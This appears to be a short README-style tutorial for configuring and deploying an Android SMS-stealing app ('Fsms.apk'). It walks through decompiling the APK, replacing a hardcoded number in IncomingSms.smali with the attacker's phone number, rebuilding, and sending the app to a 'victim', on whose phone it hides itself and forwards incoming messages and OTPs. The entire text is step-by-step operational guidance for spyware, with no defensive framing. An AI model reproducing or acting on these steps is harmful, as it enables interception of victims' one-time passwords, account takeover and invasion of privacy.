Download Fsms.apk from this repository code
Download Apk editor pro from google or from somewhere
Open apk editor and select apk from files and then open a folder in which you downloaded Fsmsapk and select that app
after clicking on the app now select decompile all files
Now click on Files and click on smali in-app above corner
Now after entering into smali folder click on com and inside it Apkeditors and inside it HackingTelegram and inside this IncomingSms.smali. Now click on this one and an editor will be opened and inside that use search icon to search this 0915000. Now when you get this line just remove this number and put your phone number with your country code (+91*********) in which you want to receive victim messages OTP etc... So after replacing check it once again. when you feel all things are good now click on the save button and click on Build. So after 2 minutes the app will be built and signed with the key, so to get that app. open your file manager and go to Internal storage and chek Apkeditor folder and click on it then you will get the app named gen_signed.apk something like this Now rename it and send it to your target (victim) when he installs it and opens the app will hide automatically. So whenever your victim receives any OTP or Messages you will get them in your device. So that's all for today so I hope guys you liked it.